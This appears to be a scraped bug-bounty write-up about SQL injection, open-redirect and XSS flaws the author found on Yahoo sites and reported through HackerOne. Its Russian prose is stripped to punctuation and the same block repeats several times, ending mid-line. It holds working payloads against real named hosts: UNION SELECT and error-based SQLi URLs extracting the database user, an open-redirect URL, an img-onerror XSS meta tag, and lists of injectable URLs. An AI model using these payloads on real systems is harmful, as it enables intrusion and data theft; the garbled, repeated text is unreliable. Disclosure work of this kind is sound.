ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 . .
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
